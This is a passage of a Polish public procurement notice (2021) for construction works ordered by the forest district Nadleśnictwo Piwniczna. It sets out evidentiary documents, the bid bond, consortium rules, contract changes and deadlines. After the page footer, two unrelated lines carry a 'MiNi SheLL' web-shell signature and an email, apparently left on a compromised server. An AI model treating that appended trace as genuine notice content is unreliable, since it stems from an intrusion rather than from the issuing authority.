dowodowych, o których mowa powyżej, wykonawca składa inne podmiotowe<br/>środki dowodowe, które w wystarczający sposób potwierdzają spełnianie opisanego przez<br/>zamawiającego warunku udziału w postępowaniu lub kryterium selekcji dotyczącego sytuacji<br/>ekonomicznej lub finansowej. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza<br/>terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w e) składa dokument lub<br/>dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania,<br/>potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.Dokument, o<br/>którym mowa powyżej, powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu<br/>składania ofert.Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje<br/>się dokumentów, o których mowa w literze e) zastępuje się je w całości lub części dokumentem<br/>zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych<br/>do jego reprezentacji, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce<br/>zamieszkania Wykonawcy. Wykonawca, który polega na zdolnościach technicznych lub zawodowych<br/>(warunki wskazane w pkt 7.1. pkt 4) SWZ na zasadach określonych w art. 118 PZP zobowiązany<br/>będzie do przedstawienia podmiotowych środków dowodowych, o których mowa literze d) i e)<br/>dotyczących tych podmiotów, potwierdzających, że nie zachodzą wobec tych podmiotów podstawy<br/>wykluczenia z postępowania. Dokumenty, o których mowa w pkt 9.1. lit a) do e) SWZ Wykonawca<br/>będzie obowiązany złożyć w terminie wskazanym przez Zamawiającego, nie krótszym niż 5 dni,<br/>określonym w wezwaniu wystosowanym przez Zamawiającego do wykonawcy po otwarciu ofert w<br/>trybie art. 274 ust. 1 PZP.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">˜Podmiotowe środki dowodowe zostały określone w pkt 9.1 SWZ tj. a)<br/>wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i<br/>miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane. Wykaz robót<br/>budowlanych stanowi załącznik nr 4 do SWZ. b)oraz załączeniem dowodów określających, czy te<br/>roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje<br/>bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały<br/>wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych<br/>dokumentów - inne odpowiednie dokumenty. Jeżeli Wykonawca powołuje się na doświadczenie w<br/>realizacji robót budowlanych, wykonanych wspólnie z innymi wykonawcami informacje określone w<br/>wykazie robót budowlanych dotyczą robót budowlanych, w których wykonawca ten bezpośrednio<br/>uczestniczył. c) wykaz osób, kierowanych przez Wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania (wzór wykazu osób<br/>skierowanych przez wykonawcę do realizacji zamówienia stanowi załącznik nr 5 do SWZ)</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Dokumenty składane wraz z ofertą:1) Formularz ofertowy - stanowiący Załącznik nr 1do SWZ.<br/>wraz z Kosztorysem ofertowym - sporządzonym metodą uproszczoną w oparciu o przedmiary<br/>wskazane w załączniku nr 8. 2) Oświadczenie Wykonawcy o braku podstaw do wykluczenia<br/>zprowadzonego postępowania oraz o spełnianiu warunków uczestnictwa 3) zobowiązanie<br/>podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych<br/>zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy<br/>potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi<br/>zasobami tych podmiotów zgodnie z pkt 7.3 SWZ, jeżeli Wykonawca wykazując spełnienie<br/>warunków udziału w postępowaniu polega na zdolnościach lub sytuacji innych podmiotów;<br/>(Niewiążący wzór zobowiązania do oddania wykonawcy do dyspozycji niezbędnych zasobów na<br/>potrzeby wykonania zamówienia stanowi załącznik nr 7 do SWZ),4) Oświadczenie podmiotu<br/>udostępniającego zasoby, o braku podstaw wykluczenia oraz o spełnianiu warunków w zakresie<br/>w jakim powołuje się na zasoby . 5) odpis lub informacja z Krajowego Rejestru<br/>Sądowego,Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego<br/>rejestru w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do<br/>jego reprezentowania. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których<br/>mowa wzdaniu poprzednim, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych<br/>iogólnodostępnych baz danych, o ile Wykonawca dostarczy dane umożliwiające dostęp do tych<br/>dokumentów,6) pełnomocnictwo lub inny dokument potwierdzający umocowanie do<br/>reprezentowania Wykonawcy, jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do<br/>jego reprezentowania nie wynika z dokumentów rejestrowych 7) pełnomocnictwo lub<br/>innydokument potwierdzający umocowanie dla pełnomocnika ustanowionego przez<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia do reprezentowania ich w<br/>postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie<br/>zamówienia publicznego,jeżeli ofertę składają Wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia 8) dokumenty, o których mowa wyżej SWZ dla osoby działającej w imieniu<br/>podmiotu udostępniającego Wykonawcy zasoby na zasadach określonych w art. 118 PZP, 9) oświadczenia w zakresie kryterium oceny ofert - na formularzu oferty. 10) wadium jeżeli wnoszone w formie nie pieniężnej <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości: 2500,00<br/>PLN (słownie: dwa tysiące 00/100 złotych);Wadium wnosi się przed upływem<br/>terminu składania ofert.Wadium może być wnoszone w jednej lub kilku następujących formach:1)<br/>pieniądzu; 2) gwarancjach bankowych;3) gwarancjach ubezpieczeniowych;4) poręczeniach<br/>udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 Listopada<br/>2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz.<br/>299). Wadium w formie pieniądza należy wnieść przelewem na rachunek bankowy<br/>Zamawiającego w PKO BP:nr rachunku dla podmiotów krajowych: PKO BP 92 1020 2892 0000<br/>5502 0549 5447 dla podmiotów zagranicznych: kod swift: BPKOPLPW z dopiskiem „Wadium –<br/>SA.270.1.4.2021. UWAGA: Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty<br/>termin uznania rachunku Zamawiającego.Wadium wnoszone w formie poręczeń lub<br/>gwarancji musi być złożone jako oryginał gwarancji lub poręczenia w postaci elektronicznej i<br/>spełniać co najmniej poniższe wymagania:1) musi obejmować odpowiedzialność za wszystkie<br/>przypadki powodujące utratę wadium przez Wykonawcę określone w ustawie PZP 2) z jej treści<br/>powinno jednoznacznej wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium;3)<br/>powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;4) termin<br/>obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z<br/>zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania ofert); 5) w treści<br/>poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego<br/>postępowania;6) beneficjentem poręczenia lub gwarancji jest: Nadleśnictwo Piwniczna 7) w<br/>przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 p.z.p.),<br/>Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych<br/>z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia (konsorcjum);Oferta wykonawcy, który nie<br/>wniesie wadium, wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium<br/>nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w<br/>przypadku, o którym mowa w art. 98 ust. 2 pkt 3 p.z.p. zostanie odrzucona .Zasady zwrotu oraz<br/>okoliczności zatrzymania wadium określa art. 98 PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Żaden z Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z<br/>postępowania. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>warunki udziału w postępowaniu powinni spełniać łącznie wszyscy Wykonawcy. W przypadku<br/>Wykonawców wykonujących działalność w formie spółki cywilnej postanowienia dot. oferty<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) stosuje się<br/>odpowiednio.W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji<br/>zawodowychlub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>mogą polegać na zdolnościach tych Wykonawców, którzy wykonają roboty budowlane lub usługi do realizacji których te zdolności są wymagane. W takim przypadku Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika,<br/>które roboty budowlane lub usługi wykonają poszczególni Wykonawcy. Wzór oświadczenia<br/>stanowi załącznik nr 3 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> ˜Dopuszczalne zmiany zostały określone w § 15 Umowy Zmiana postanowień<br/>Umowy1.Wszelkie zmiany niniejszej Umowy wymagają formy pisemnej pod rygorem<br/>nieważności. Umowa może ulec zmianie zgodnie z art. 455 ustawy Pzp.2.Strony mają prawo do<br/>przedłużenia terminu zakończenia robót o okres trwania przeszkód, z powodu których nie będzie<br/>możliwe dotrzymanie terminu zakończenia robót określonego w § 2 ust. 1 pkt. 1.2 Umowy, w<br/>następujących sytuacjach:1) jeżeli przeszkody z powodu których będzie zagrożone dotrzymanie<br/>terminu zakończenia robót będą następstwem okoliczności, za które odpowiedzialność ponosi<br/>Zamawiający, w szczególności będą następstwem nieterminowego przekazania terenu budowy,<br/>konieczności zmian dokumentacji projektowej w zakresie, w jakim ww. okoliczności miały lub<br/>będą mogły mieć wpływ na dotrzymanie terminu zakończenia robót;2) jeżeli przeszkody z<br/>powodu których będzie zagrożone dotrzymanie terminu zakończenia robót będą następstwem<br/>okoliczności, za które odpowiedzialność ponosi inny wykonawca i nie będą one wynikiem<br/>działań ani zaniechań wykonawcy ani jego podwykonawców;3) wystąpienia siły wyższej<br/>uniemożliwiającej wykonanie przedmiotu Umowy zgodnie z jej postanowieniami lub w przypadku<br/>wystąpienia niekorzystnych warunków atmosferycznych uniemożliwiających prawidłowe<br/>wykonanie robót, w szczególności z powodu technologii realizacji prac określonej: Umową,<br/>normami lub innymi przepisami, wymagającej konkretnych warunków atmosferycznych, jeżeli<br/>konieczność wykonania prac w tym okresie nie jest następstwem okoliczności, za które<br/>Wykonawca ponosi odpowiedzialność; 4) gdy wystąpi konieczność wykonania robót zamiennych<br/>lub innych robót niezbędnych do wykonania przedmiotu Umowy a nieprzewidywalnych na etapie<br/>zawierania np. ze względu na zasady wiedzy technicznej, które wstrzymują lub opóźniają<br/>realizację przedmiotu Umowy, lub w sytuacji wystąpienia niebezpieczeństwa kolizji z<br/>planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami w zakresie<br/>niezbędnym do uniknięcia lub usunięcia tych kolizji;5) wystąpią opóźnienia w dokonaniu<br/>określonych czynności lub ich zaniechanie przez właściwe organy administracji państwowej,<br/>które nie są następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność;6) gdy<br/>wystąpią opóźnienia w wydawaniu decyzji, zezwoleń, uzgodnień, itp., do wydania których<br/>właściwe organy są zobowiązane na mocy przepisów prawa, jeżeli opóźnienie przekroczy okres<br/>przewidziany w przepisach prawa, w którym ww. decyzje powinny zostać wydane oraz nie są<br/>następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność;7) jeżeli wystąpi brak<br/>możliwości wykonywania robót z powodu nie dopuszczania do ich wykonywania przez<br/>uprawniony organ lub nakazania ich wstrzymania przez uprawniony organ, z przyczyn<br/>niezależnych od Wykonawcy, a także obostrzeń związanych z pandemią COVID 19.Pozostałe<br/>zmiany zostały określone w § 15 Umowy ust. 3-8 . <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-28 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">http://platformazakupowa.pl/pn/lasy_piwniczna</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-28 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-27</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-09 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com